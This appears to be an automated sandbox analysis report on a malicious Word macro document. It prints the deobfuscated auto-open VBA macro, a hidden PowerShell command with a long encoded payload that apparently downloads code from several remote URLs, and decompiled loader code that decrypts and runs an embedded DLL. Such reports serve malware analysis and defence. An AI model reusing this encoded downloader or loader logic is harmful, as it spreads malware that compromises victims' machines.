[sgAJ]b2[swBs]b2[sAHE]b2[sAdA]b2[sBaA]b2[sCcA]b2[sKwA]b2[snAE]b2[s0AJ]b2[swAp]b2[sACs]b2[sAJw]b2[sBQA]b2[sEIA]b2[sJwA]b2[srAC]b2[sgAJ]b2[swB4]b2[sACc]b2[sAKw]b2[sAnA]b2[sDUA]b2[sagA]b2[snAC]b2[skAK]b2[swAn]b2[sAGY]b2[sAJw]b2[sArA]b2[sCgA]b2[sJwB]b2[stAG]b2[s8AW]b2[sgBN]b2[sACc]b2[sAKw]b2[sAnA]b2[sFAA]b2[sJwA]b2[spAC]b2[skAL]b2[sQBS]b2[sAGU]b2[sAcA]b2[sBsA]b2[sGEA]b2[sYwB]b2[sFAC]b2[sgAW]b2[swBD]b2[sAGg]b2[sAYQ]b2[sBSA]b2[sF0A]b2[sOQA]b2[swAC]b2[ssAW]b2[swBD]b2[sAGg]b2[sAYQ]b2[sBSA]b2[sF0A]b2[sNwA]b2[s3AC]b2[ssAW]b2[swBD]b2[sAGg]b2[sAYQ]b2[sBSA]b2[sF0A]b2[sOAA]b2[swAC]b2[skAL]b2[sABb]b2[sAEM]b2[sAaA]b2[sBh,"]b2[s",) -> cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD JAA2ADkAbQBEAFQANwAgACAAPQAgAFsAdAB5AFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADIAfQAiAC0AZgAnAFIAJwAsACcAUwAnACwAJwBZACcALAAnAFkAUwB0AEUATQAuAEkATwAuAGQAaQBSAEUAYwBUAE8AJwApACAAOwAgACAAIAAkAHkAMQAwAEkAIAAgAD0AIABbAFQAeQBwAEUAXQAoACIAewA2AH0AewAzAH0AewAyAH0AewA3AH0AewA0AH0AewAxAH0AewA1AH0AewA4AH0AewAwAH0AIgAtAGYAIAAnAGEARwBlAFIAJwAsACcAdAAuACcALAAnAEUAJwAsACcAWQBTAHQAJwAsACcATgBFACcALAAnAHMARQBSAHYAaQBDACcALAAnAHMAJwAsACcAbQAuACcALAAnAGUAUABvAGkAbgB0AG0AYQBuACcAKQA7ACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAoACcAUwBpACcAKwAnAGwAZQBuAHQAbAB5ACcAKQArACgAJwBDAG8AJwArACcAbgAnACkAKwAnAHQAJwArACgAJwBpAG4AJwArACcAdQAnACkAKwAnAGUAJwApADsAJABQAHkAMABlAGIAagBpAD0AJABLADEAMgBPACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABQADYANQBaADsAJABYADkAMgBDAD0AKAAoACcAVQAnACsAJwBfADgAJwApACsAJwBSACcAKQA7ACAAIAAkADYAOQBNAGQAdAA3ADoAOgAiAEMAcgBgAGUAYQBUAGAARQBkAEkAUgBFAEMAdABvAGAAUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAWgAnACsAKAAnAE0AJwArACcAUABZAGcAeQAnACsAJwBoACcAKQArACgAJwBsAHEAdABaACcAKwAnAE0AJwApACsAJwBQAEIAJwArACgAJwB4ACcAKwAnADUAagAnACkAKwAnAGYAJwArACgAJwBtAG8AWgBNACcAKwAnAFAAJwApACkALQBSAGUAcABsAGEAYwBFACgAWwBDAGgAYQBSAF0AOQAwACsAWwBDAGgAYQBSAF0ANwA3ACsAWwBDAGgAYQBSAF0AOAAwACkALABbAEMAaABhAFIAXQA5ADIAKQApADsAJABHADcANwBHAD0AKAAnAFgAOAAnACsAJwAwAFAAJwApADsAIAAkAHkAMQAwAEkAOgA6ACIAUwBlAEMAdQByAEkAdABgAHkAcAByAE8AYABUAE8AYABjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQASgAzADQASgA9ACgAKAAnAFoAMgAnACsAJwA4ACcAKQArACcATgAnACkAOwAkAFIAaQA2ADIAcwBvAGsAIAA9ACAAKAAnAFIANAAnACsAJwAzAEgAJwApADsAJABUADkAXwBJAD0AKAAnAEgANQAnACsAJwA4AEwAJwApADsAJABCAGgAbgB3AGUAOQAyAD0AJABIAE8ATQBFACsAKAAoACcATQBvACcAKwAoACcAUQBZAGcAJwArACcAeQAnACkAKwAoACcAaABsAHEAdABNAG8AUQAnACsAJwBCACcAKwAnAHgAJwApACsAKAAnADUAagBmAG0AJwArACcAbwBNACcAKwAnAG8AUQAnACkAKQAuACIAcgBgAEUAUABsAGAAQQBDAGUAIgAoACgAJwBNAG8AJwArACcAUQAnACkALABbAFMAVABSAGkATgBHAF0AWwBDAEgAQQByAF0AOQAyACkAKQArACQAUgBpADYAMgBzAG8AawArACgAKAAnAC4AJwArACcAZABsACcAKQArACcAbAAnACkAOwAkAFcANQAwAFYAPQAoACcAWQAnACsAKAAnADcAOQAnACsAJwBZACcAKQApADsAJABPAGcAXwA0ADMAXwBtAD0AKAAnAF0AJwArACgAJwBiADIAWwBzADoAJwArACcALwAnACsAJwAvAGEAbABsACcAKQArACgAJwBjAGEAJwArACcAbgBuAGEAYgBpACcAKwAnAHMAbQBlACcAKQArACgAJwBkACcAKwAnAHMALgBjAG8AbQAnACsAJwAvACcAKQArACgAJwB1ACcAKwAnAG4AcgAnACkAKwAoACcAYQBpAGQALQAnACsAJwBtAGEAcAAvAFoAJwArACcAWgAnACkAKwAoACcAbQAnACsAJwA2AC8AJwArACcAQABdAGIAJwApACsAKAAnADIAWwAnACsAJwBzACcAKQArACgAJwA6AC8ALwBnACcAKwAnAGkAJwArACcAYQBuACcAKQArACcAbgAnACsAKAAnAGEAJwArACcAcwBwAHMAeQAnACsAJwBjACcAKQArACcAaABpACcAKwAoACcAYwAnACsAJwBzAHQAdQAnACkAKwAoACcAZABpACcAKwAnAG8ALgBjAG8AbQAnACkAKwAoACcALwAnACsAJwBjAGcAaQAtACcAKQArACgAJwBiAGkAJwArACcAbgAvAFAAJwArACcAUAAvAEAAJwArACcAXQAnACkAKwAoACcAYgAnACsAJwAyAFsAcwA6ACcAKQArACcALwAvACcAKwAoACcAaQBlAG4AZwAnACsAJwBsAGkAcwBoACcAKwAnAGEAYgBjAC4AJwArACcAYwAnACkAKwAoACcAbwAnACsAJwBtAC8AJwApACsAKAAnAGMAJwArACcAbwB3AC8AJwArACcASgBIAC8AQAAnACsAJwBdAGIAMgBbAHMAOgAvACcAKQArACcALwBhACcAKwAoACcAYgAnACsAJwByAGkAbAAnACkAKwAoACcAbABvAGYAJwArACcAdQAnACkAKwAoACcAcgBuAGkAdAAnACsAJwB1ACcAKQArACgAJwByACcAKwAnAGUALgBjACcAKQArACgAJwBvAG0ALwBiACcAKwAnAHAAaAAnACsAJwAtACcAKwAnAG4AYwBsAGUAeAAtAHcAeQAnACsAJwBnACcAKQArACgAJwBxACcAKwAnADQAJwArACcALwBhADcAbgBCACcAKQArACcAZgAnACsAKAAnAGgAcwAnACsAJwAvACcAKQArACcAQAAnACsAJwBdACcAKwAoACcAYgAyACcAKwAnAFsAJwApACsAKAAnAHMAJwArACcAcwA6AC8AJwArACcALwBlAHQAJwArACcAawAnACsAJwBpAG4AZABlAGQAJwApACsAKAAnAGUAawAnACsAJwB0AGkAZgBsAGkAawAuAGMAJwArACcAbwAnACkAKwAoACcAbQAvAHAAYwAnACsAJwBpAGUALQBzACcAKwAnAHAAJwApACsAJwBlACcAKwAoACcAZQBkAC8AJwArACcAVQAvAEAAXQBiADIAWwAnACsAJwBzAHMAJwApACsAKAAnADoALwAvAHYAcwB0ACcAKwAnAHMAJwArACcAYQAnACkAKwAnAG0AcAAnACsAKAAnAGwAZQAnACsAJwAuAGMAbwBtAC8AdwBwAC0AJwArACcAaQBuAGMAbAAnACsAJwB1AGQAJwArACcAZQBzACcAKwAnAC8AJwArACcANwBlAFgAJwApACsAKAAnAGUASQAnACsAJwAvACcAKwAnAEAAXQBiADIAWwAnACkAKwAnAHMAOgAnACsAJwAvAC8AJwArACgAJwBlAHoAaQAnACsAJwAtAHAAbwBzAC4AYwAnACsAJwBvAG0ALwBjACcAKwAnAGEAdABlAGcAbwByAHkAJwArACcAbAAnACsAJwAvAHgALwAnACkAKQAuACIAcgBFAHAAbABBAGAAYwBlACIAKAAoACcAXQAn
Dh8iwtx_gbrodi
FreeFile
Open
Open
LOF
intGend

Strings	Decrypted Strings
"F:\KqqRCCD\OxxrCn\eQUMRH.ZdxMJ"
"O:\ikJcU\cGIxAAG\fEBwJJ.UFkBBLGk"
"]b2[s"
"F:\KrczWMd\cxBwEA\spjtC.VvknDGZ"
"O:\VoJkkBWBC\NcgoF\KcMVOEFe.igOXKnIU"

Line	Instruction	Meta Information
214	Function Jumkzxvtzz2s(Fuws4dl87mo)
215	Mjjc2_q8vgjc36 = G9cdtgijbhc3ewc	G9cdtgijbhc3ewc executed
216	Goto OkxlX
217	Dim XUiHBHHUH() as Byte
218	Dim VGYhDjxf as Integer
219	VGYhDjxf = FreeFile	FreeFile
220	Open "F:\KqqRCCD\OxxrCn\eQUMRH.ZdxMJ" For Binary Access Read As # VGYhDjxf	Open
221	Open "O:\ikJcU\cGIxAAG\fEBwJJ.UFkBBLGk" For Binary Access Read As # VGYhDjxf	Open
222	Redim XUiHBHHUH(1 To LOF(intGend) - 5)	LOF intGend
223	Get # VGYhDjxf, , XUiHBHHUH
224	Get # VGYhDjxf, , XUiHBHHUH
225	Get # VGYhDjxf, , XUiHBHHUH
226	Close # VGYhDjxf
226	OkxlX:
228	Jumkzxvtzz2s = Replace(Fuws4dl87mo, "]b2[s", Dh8iwtx_gbrodi)	Replace("w]b2[sin]b2[sm]b2[sgm]b2[st]b2[s]b2[s]b2[ss]b2[s]b2[s:w]b2[s]b2[sin]b2[s3]b2[s2]b2[s_]b2[s]b2[sp]b2[s]b2[sro]b2[s]b2[sce]b2[ss]b2[ss]b2[s]b2[s","]b2[s",) -> winmgmts:win32_process Dh8iwtx_gbrodi executed
229	Goto XDAaIBnI
230	Dim YVAKAT() as Byte
231	Dim yhCeYdDx as Integer
232	yhCeYdDx = FreeFile	FreeFile
233	Open "F:\KrczWMd\cxBwEA\spjtC.VvknDGZ" For Binary Access Read As # yhCeYdDx	Open
234	Open "O:\VoJkkBWBC\NcgoF\KcMVOEFe.igOXKnIU" For Binary Access Read As # yhCeYdDx	Open
235	Redim YVAKAT(1 To LOF(intGend) - 5)	LOF intGend
236	Get # yhCeYdDx, , YVAKAT
237	Get # yhCeYdDx, , YVAKAT
238	Get # yhCeYdDx, , YVAKAT
239	Close # yhCeYdDx
239	XDAaIBnI:
241	End Function

Module: Xlb0g5eyj545

Declaration

Line	Content
1	Attribute VB_Name = "Xlb0g5eyj545"
2	Attribute VB_Base = "1Normal.ThisDocument"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = True
6	Attribute VB_Exposed = True
7	Attribute VB_TemplateDerived = True
8	Attribute VB_Customizable = True

Executed Functions

Subroutine Document_open, APIs: 67, Strings: 0, Number of lines: 3, Relevance: 102.003

APIs	Meta Information
Part of subcall function Jotxu6biv0471oy0@Xhlj9irufb65_wekzf: Item
Part of subcall function Jotxu6biv0471oy0@Xhlj9irufb65_wekzf: FreeFile
Part of subcall function Jotxu6biv0471oy0@Xhlj9irufb65_wekzf: Open
Part of subcall function Jotxu6biv0471oy0@Xhlj9irufb65_wekzf: Open
Part of subcall function Jotxu6biv0471oy0@Xhlj9irufb65_wekzf: LOF
Part of subcall function Jotxu6biv0471oy0@Xhlj9irufb65_wekzf: intGend
Part of subcall function Jotxu6biv0471oy0@Xhlj9irufb65_wekzf: FreeFile
Part of subcall function Jotxu6biv0471oy0@Xhlj9irufb65_wekzf: Open
Part of subcall function Jotxu6biv0471oy0@Xhlj9irufb65_wekzf: Open
Part of subcall function Jotxu6biv0471oy0@Xhlj9irufb65_wekzf: LOF
Part of subcall function Jotxu6biv0471oy0@Xhlj9irufb65_wekzf: intGend
Part of subcall function Jotxu6biv0471oy0@Xhlj9irufb65_wekzf: FreeFile
Part of subcall function Jotxu6biv0471oy0@Xhlj9irufb65_wekzf: Open
Part of subcall function Jotxu6biv0471oy0@Xhlj9irufb65_wekzf: Open
Part of subcall function Jotxu6biv0471oy0@Xhlj9irufb65_wekzf: LOF
Part of subcall function Jotxu6biv0471oy0@Xhlj9irufb65_wekzf: intGend
Part of subcall function Jotxu6biv0471oy0@Xhlj9irufb65_wekzf: FreeFile
Part of subcall function Jotxu6biv0471oy0@Xhlj9irufb65_wekzf: Open
Part of subcall function Jotxu6biv0471oy0@Xhlj9irufb65_wekzf: Open
Part of subcall function Jotxu6biv0471oy0@Xhlj9irufb65_wekzf: LOF
Part of subcall function Jotxu6biv0471oy0@Xhlj9irufb65_wekzf: intGend
Part of subcall function Jotxu6biv0471oy0@Xhlj9irufb65_wekzf: FreeFile
Part of subcall function Jotxu6biv0471oy0@Xhlj9irufb65_wekzf: Open
Part of subcall function Jotxu6biv0471oy0@Xhlj9irufb65_wekzf: Open
Part of subcall function Jotxu6biv0471oy0@Xhlj9irufb65_wekzf: LOF
Part of subcall function Jotxu6biv0471oy0@Xhlj9irufb65_wekzf: intGend
Part of subcall function Jotxu6biv0471oy0@Xhlj9irufb65_wekzf: FreeFile
Part of subcall function Jotxu6biv0471oy0@Xhlj9irufb65_wekzf: Open
Part of subcall function Jotxu6biv0471oy0@Xhlj9irufb65_wekzf: Open
Part of subcall function Jotxu6biv0471oy0@Xhlj9irufb65_wekzf: LOF
Part of subcall function Jotxu6biv0471oy0@Xhlj9irufb65_wekzf: intGend
Part of subcall function Jotxu6biv0471oy0@Xhlj9irufb65_wekzf: FreeFile
Part of subcall function Jotxu6biv0471oy0@Xhlj9irufb65_wekzf: Open
Part of subcall function Jotxu6biv0471oy0@Xhlj9irufb65_wekzf: Open
Part of subcall function Jotxu6biv0471oy0@Xhlj9irufb65_wekzf: LOF
Part of subcall function Jotxu6biv0471oy0@Xhlj9irufb65_wekzf: intGend
Part of subcall function Jotxu6biv0471oy0@Xhlj9irufb65_wekzf: CreateObject
Part of subcall function Jotxu6biv0471oy0@Xhlj9irufb65_wekzf: FreeFile
Part of subcall function Jotxu6biv0471oy0@Xhlj9irufb65_wekzf: Open
Part of subcall function Jotxu6biv0471oy0@Xhlj9irufb65_wekzf: Open
Part of subcall function Jotxu6biv0471oy0@Xhlj9irufb65_wekzf: LOF
Part of subcall function Jotxu6biv0471oy0@Xhlj9irufb65_wekzf: intGend
Part of subcall function Jotxu6biv0471oy0@Xhlj9irufb65_wekzf: Mid
Part of subcall function Jotxu6biv0471oy0@Xhlj9irufb65_wekzf: Len
Part of subcall function Jotxu6biv0471oy0@Xhlj9irufb65_wekzf: FreeFile
Part of subcall function Jotxu6biv0471oy0@Xhlj9irufb65_wekzf: Open
Part of subcall function Jotxu6biv0471oy0@Xhlj9irufb65_wekzf: Open
Part of subcall function Jotxu6biv0471oy0@Xhlj9irufb65_wekzf: LOF
Part of subcall function Jotxu6biv0471oy0@Xhlj9irufb65_wekzf: intGend
Part of subcall function Jotxu6biv0471oy0@Xhlj9irufb65_wekzf: FreeFile
Part of subcall function Jotxu6biv0471oy0@Xhlj9irufb65_wekzf: Open
Part of subcall function Jotxu6biv0471oy0@Xhlj9irufb65_wekzf: Open
Part of subcall function Jotxu6biv0471oy0@Xhlj9irufb65_wekzf: LOF
Part of subcall function Jotxu6biv0471oy0@Xhlj9irufb65_wekzf: intGend
Part of subcall function Jotxu6biv0471oy0@Xhlj9irufb65_wekzf: Create
Part of subcall function Jotxu6biv0471oy0@Xhlj9irufb65_wekzf: Ndofzqkqt8o8ky4
Part of subcall function Jotxu6biv0471oy0@Xhlj9irufb65_wekzf: Es2mklc5pr30boja
Part of subcall function Jotxu6biv0471oy0@Xhlj9irufb65_wekzf: FreeFile
Part of subcall function Jotxu6biv0471oy0@Xhlj9irufb65_wekzf: Open
Part of subcall function Jotxu6biv0471oy0@Xhlj9irufb65_wekzf: Open
Part of subcall function Jotxu6biv0471oy0@Xhlj9irufb65_wekzf: LOF
Part of subcall function Jotxu6biv0471oy0@Xhlj9irufb65_wekzf: intGend
Part of subcall function Jotxu6biv0471oy0@Xhlj9irufb65_wekzf: FreeFile
Part of subcall function Jotxu6biv0471oy0@Xhlj9irufb65_wekzf: Open
Part of subcall function Jotxu6biv0471oy0@Xhlj9irufb65_wekzf: Open
Part of subcall function Jotxu6biv0471oy0@Xhlj9irufb65_wekzf: LOF
Part of subcall function Jotxu6biv0471oy0@Xhlj9irufb65_wekzf: intGend

Line	Instruction	Meta Information
9	Private Sub Document_open()
10	Jotxu6biv0471oy0	executed
11	End Sub

Reset < >

Analysis Process: powershell.exe PID: 2300 Parent PID: 2456 powershell.exeCOMMON

Executed Functions

Function 000007FF00282145, Relevance: .2, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2113683200.000007FF00280000.00000040.00000001.sdmp, Offset: 000007FF00280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff00280000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4217944e778013f6b5d8e2e8a7f884c853c13279f9364b56b6341bda63656361
Instruction ID: 5f79615821cb8c48712423b2d780a672392259a995d31b6e70c83f9fb974abcf
Opcode Fuzzy Hash: 4217944e778013f6b5d8e2e8a7f884c853c13279f9364b56b6341bda63656361
Instruction Fuzzy Hash: 0451852151EBC64FE7435778586AAA07FB0EF17210B4A01E7D888CF0A3D9485D9EC3A2

Uniqueness

Uniqueness Score: -1.00%

Function 000007FF00280655, Relevance: .2, Instructions: 164COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2113683200.000007FF00280000.00000040.00000001.sdmp, Offset: 000007FF00280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff00280000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 423b5ad9ae420148a28efab25d35af1884c3f2d12f28e1b5a2413c785882b153
Instruction ID: d5f352f537b5e8ead75246425917f3f37065da4d73ddd69a73de2a7d06dd6f1d
Opcode Fuzzy Hash: 423b5ad9ae420148a28efab25d35af1884c3f2d12f28e1b5a2413c785882b153
Instruction Fuzzy Hash: 0241F32180E7C24FDB4387785CA5AA1BFB0AF13204B1E42E7D484CF4A3E6189D5AC762

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: rundll32.exe PID: 2384 Parent PID: 2548 rundll32.exeCOMMON

Execution Graph

Execution Coverage:	4.8%
Dynamic/Decrypted Code Coverage:	32%
Signature Coverage:	23.1%
Total number of Nodes:	641
Total number of Limit Nodes:	44

Executed Functions

Function 10001E91, Relevance: 203.4, APIs: 110, Strings: 6, Instructions: 425
libraryloadermemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 93%

			E10001E91(void* __ecx, void* __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				char _v21;
				struct HWND__* _v28;
				char _v32;
				char _v36;
				char _v40;
				void* __ebp;
				signed int _t22;
				struct HINSTANCE__* _t24;
				int _t25;
				CHAR* _t29;
				void* _t33;
				void* _t35;
				int _t136;
				void* _t137;
				signed int _t138;
				signed int _t139;
				void* _t140;
				void* _t146;
				intOrPtr* _t147;
				void* _t153;
				void* _t156;
				void* _t157;
				void* _t159;
				void* _t162;
				struct HINSTANCE__* _t163;
				signed int _t173;

				_t162 = __edx;
				_t153 = __ecx;
				_t22 =  *0x1004d054; // 0xd94e5c04
				_v8 = _t22 ^ _t173;
				_t24 = LoadLibraryA("MFC42.DLL"); // executed
				if(_t24 == 0) {
					L5:
					_t25 = 0;
					__eflags = 0;
				} else {
					_v20 = 0x17;
					_v36 = 0;
					_v28 = 0;
					_v16 = 0x1e55;
					_v12 = 0x409;
					_t163 = LoadLibraryA("ntdll.dll");
					_t29 = E10001A7D("LdrFindResource_U", E1000E3D0("LdrFindResource_U")); // executed
					 *0x1004db58 = GetProcAddress(_t163, _t29);
					 *0x1004db5c = GetProcAddress(_t163, "LdrAccessResource");
					_push( &_v40);
					_t33 = E1000FEF7(_t153, "3");
					_pop(_t156);
					_t35 =  *0x1004db58(0x10000000,  &_v20, _t33);
					ShowWindow(0, 0); // executed
					ShowWindow(0, 0); // executed
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					if(_t35 >= 0) {
						 *0x1004db5c(0x10000000, _v40,  &_v36,  &_v28);
					}
					_t136 = WriteFileGather(0, 0, 0, 0, 0);
					_t179 = _t136;
					if(_t136 != 0) {
						goto L5;
					} else {
						_t137 = E1000FEF7(_t156, L"64");
						_pop(_t157);
						_t138 = E1000FEF7(_t157, L"64");
						_t139 = E1000FEF7(_t157, L"64");
						_t159 = _t137;
						_t140 = VirtualAlloc(0, _v28, _t138 * _t139, ??); // executed
						E100045C0(_t140, _v36, _v28);
						E10001D16(_t159, _t179, "k1>@dY0V<o)afFNz7v68r^Kn6)h)OGcSc", 0x22,  &_v32);
						E10001D9A(_t140, _v28,  &_v32);
						_t146 = E10002838(_t140, _v28); // executed
						_t147 = E10002765( &_v21, _t146, "Control_RunDLL"); // executed
						 *_t147(); // executed
						_t25 = MessageBoxA(0,  *0x1004d024, 0, 0);
					}
				}
				return E100037EA(_t25, _v8 ^ _t173, _t162);
			}

0x10001e91
0x10001e91
0x10001e97
0x10001e9e
0x10001eaf
0x10001eb3
0x1000217a
0x1000217a
0x1000217a
0x10001eb9
0x10001ebb
0x10001ec7
0x10001eca
0x10001ecd
0x10001ed4
0x10001ee2
0x10001eec
0x10001f04
0x10001f0b
0x10001f13
0x10001f19
0x10001f1e
0x10001f29
0x10001f39
0x10001f3d
0x10001f41
0x10001f45
0x10001f49
0x10001f4d
0x10001f51
0x10001f55
0x10001f59
0x10001f5d
0x10001f61
0x10001f65
0x10001f69
0x10001f6d
0x10001f71
0x10001f75
0x10001f79
0x10001f7d
0x10001f81
0x10001f85
0x10001f89
0x10001f8d
0x10001f91
0x10001f95
0x10001f99
0x10001f9d
0x10001fa1
0x10001fa5
0x10001fa9
0x10001fad
0x10001fb1
0x10001fb5
0x10001fb9
0x10001fbd
0x10001fc1
0x10001fc5
0x10001fc9
0x10001fcd
0x10001fd1
0x10001fd5
0x10001fd9
0x10001fdd
0x10001fe1
0x10001fe5
0x10001fe9
0x10001fed
0x10001ff1
0x10001ff5
0x10001ff9
0x10001ffd
0x10002001
0x10002005
0x10002009
0x1000200d
0x10002011
0x10002015
0x10002019
0x1000201d
0x10002021
0x10002025
0x10002029
0x1000202d
0x10002031
0x10002035
0x10002039
0x1000203d
0x10002041
0x10002045
0x10002049
0x1000204d
0x10002051
0x10002055
0x10002059
0x1000205d
0x10002061
0x10002065
0x10002069
0x1000206d
0x10002071
0x10002075
0x10002079
0x1000207d
0x10002081
0x10002085
0x10002089
0x1000208d
0x10002091
0x10002095
0x10002099
0x1000209d
0x100020a1
0x100020a5
0x100020a9
0x100020ad
0x100020b1
0x100020b5
0x100020b9
0x100020bd
0x100020c1
0x100020c5
0x100020c9
0x100020db
0x100020db
0x100020e6
0x100020ec
0x100020ee
0x00000000
0x100020f4
0x100020fa
0x100020ff
0x10002102
0x1000210a
0x10002113
0x10002119
0x10002128
0x10002138
0x10002145
0x10002154
0x10002162
0x10002167
0x10002172
0x10002172
0x100020ee
0x1000218a

APIs

LoadLibraryA.KERNEL32(MFC42.DLL), ref: 10001EAF
LoadLibraryA.KERNEL32(ntdll.dll), ref: 10001EDB
_strlen.LIBCMT ref: 10001EE5

Part of subcall function 10001A7D: GetCurrentProcess.KERNEL32(00000000,?,00003000,00000040,00000000,LdrFindResource_U,?,10001EF1,LdrFindResource_U,00000000,LdrFindResource_U), ref: 10001A8F
Part of subcall function 10001A7D: VirtualAllocExNuma.KERNEL32 ref: 10001A96

GetProcAddress.KERNEL32(00000000,00000000), ref: 10001EFC
GetProcAddress.KERNEL32(00000000,LdrAccessResource), ref: 10001F09
LdrFindResource_U.NTDLL(10000000,00000017,00000000,?), ref: 10001F29
ShowWindow.USER32(00000000,00000000), ref: 10001F39
ShowWindow.USER32(00000000,00000000), ref: 10001F3D
ShowWindow.USER32(00000000,00000000), ref: 10001F41
ShowWindow.USER32(00000000,00000000), ref: 10001F45
ShowWindow.USER32(00000000,00000000), ref: 10001F49
ShowWindow.USER32(00000000,00000000), ref: 10001F4D
ShowWindow.USER32(00000000,00000000), ref: 10001F51
ShowWindow.USER32(00000000,00000000), ref: 10001F55
ShowWindow.USER32(00000000,00000000), ref: 10001F59
ShowWindow.USER32(00000000,00000000), ref: 10001F5D
ShowWindow.USER32(00000000,00000000), ref: 10001F61
ShowWindow.USER32(00000000,00000000), ref: 10001F65
ShowWindow.USER32(00000000,00000000), ref: 10001F69
ShowWindow.USER32(00000000,00000000), ref: 10001F6D
ShowWindow.USER32(00000000,00000000), ref: 10001F71
ShowWindow.USER32(00000000,00000000), ref: 10001F75
ShowWindow.USER32(00000000,00000000), ref: 10001F79
ShowWindow.USER32(00000000,00000000), ref: 10001F7D
ShowWindow.USER32(00000000,00000000), ref: 10001F81
ShowWindow.USER32(00000000,00000000), ref: 10001F85
ShowWindow.USER32(00000000,00000000), ref: 10001F89
ShowWindow.USER32(00000000,00000000), ref: 10001F8D
ShowWindow.USER32(00000000,00000000), ref: 10001F91
ShowWindow.USER32(00000000,00000000), ref: 10001F95
ShowWindow.USER32(00000000,00000000), ref: 10001F99
ShowWindow.USER32(00000000,00000000), ref: 10001F9D
ShowWindow.USER32(00000000,00000000), ref: 10001FA1
ShowWindow.USER32(00000000,00000000), ref: 10001FA5
ShowWindow.USER32(00000000,00000000), ref: 10001FA9
ShowWindow.USER32(00000000,00000000), ref: 10001FAD
ShowWindow.USER32(00000000,00000000), ref: 10001FB1
ShowWindow.USER32(00000000,00000000), ref: 10001FB5
ShowWindow.USER32(00000000,00000000), ref: 10001FB9
ShowWindow.USER32(00000000,00000000), ref: 10001FBD
ShowWindow.USER32(00000000,00000000), ref: 10001FC1
ShowWindow.USER32(00000000,00000000), ref: 10001FC5
ShowWindow.USER32(00000000,00000000), ref: 10001FC9
ShowWindow.USER32(00000000,00000000), ref: 10001FCD
ShowWindow.USER32(00000000,00000000), ref: 10001FD1
ShowWindow.USER32(00000000,00000000), ref: 10001FD5
ShowWindow.USER32(00000000,00000000), ref: 10001FD9
ShowWindow.USER32(00000000,00000000), ref: 10001FDD
ShowWindow.USER32(00000000,00000000), ref: 10001FE1
ShowWindow.USER32(00000000,00000000), ref: 10001FE5
ShowWindow.USER32(00000000,00000000), ref: 10001FE9
ShowWindow.USER32(00000000,00000000), ref: 10001FED
ShowWindow.USER32(00000000,00000000), ref: 10001FF1
ShowWindow.USER32(00000000,00000000), ref: 10001FF5
ShowWindow.USER32(00000000,00000000), ref: 10001FF9
ShowWindow.USER32(00000000,00000000), ref: 10001FFD
ShowWindow.USER32(00000000,00000000), ref: 10002001
